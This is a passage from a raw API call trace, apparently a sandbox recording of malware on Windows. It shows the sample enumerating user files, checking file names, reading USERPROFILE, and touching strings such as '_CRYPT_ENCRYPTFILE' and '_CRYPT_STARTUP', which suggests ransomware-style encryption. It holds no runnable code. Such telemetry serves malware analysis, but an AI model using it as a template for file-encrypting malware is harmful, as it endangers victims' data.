ftLastWriteTime.dwLowDateTime=0xc9d842b0, ftLastWriteTime.dwHighDateTime=0x1d5e779, nFileSizeHigh=0x0, nFileSizeLow=0x1472a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZBOT YHAwSRJf tb.wav", cAlternateFileName="ZBOTYH~1.WAV")) returned 1 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe917aad0, ftCreationTime.dwHighDateTime=0x1d5ef67, ftLastAccessTime.dwLowDateTime=0xf6bc5750, ftLastAccessTime.dwHighDateTime=0x1d5ecbd, ftLastWriteTime.dwLowDateTime=0xf6bc5750, ftLastWriteTime.dwHighDateTime=0x1d5ecbd, nFileSizeHigh=0x0, nFileSizeLow=0xc394, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZTd7YZt.xlsx", cAlternateFileName="ZTD7YZ~1.XLS")) returned 1 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] FindClose (in: hFindFile=0xa87710 | out: hFindFile=0xa87710) returned 1 [0217.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0217.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.168] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.168] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.169] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.169] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.169] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ZbS9.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZbS9.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bS9.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S9.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0217.169] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ZbS9.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZbS9.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bS9.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0217.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S9.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0217.169] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.169] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0217.170] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0217.170] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x3be0dd0 [0217.170] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0217.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0217.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0217.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0217.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.256] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/-ZbS9.pps", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fec6fb0, ftCreationTime.dwHighDateTime=0x1d5e79d, ftLastAccessTime.dwLowDateTime=0x68244cb0, ftLastAccessTime.dwHighDateTime=0x1d5e4c4, ftLastWriteTime.dwLowDateTime=0x68244cb0, ftLastWriteTime.dwHighDateTime=0x1d5e4c4, nFileSizeHigh=0x0, nFileSizeLow=0xf038, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="-ZbS9.pps", cAlternateFileName="")) returned 0xa87390 [0217.257] FindClose (in: hFindFile=0xa87390 | out: hFindFile=0xa87390) returned 1 [0217.257] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0217.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0217.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0217.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0217.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0217.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0217.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0217.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.258] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0217.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0217.258] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0217.258] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0217.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0217.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0217.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0217.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0217.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0217.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0217.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0217.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0217.259] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.260] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0217.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0217.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0217.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0217.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0217.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0217.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0217.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 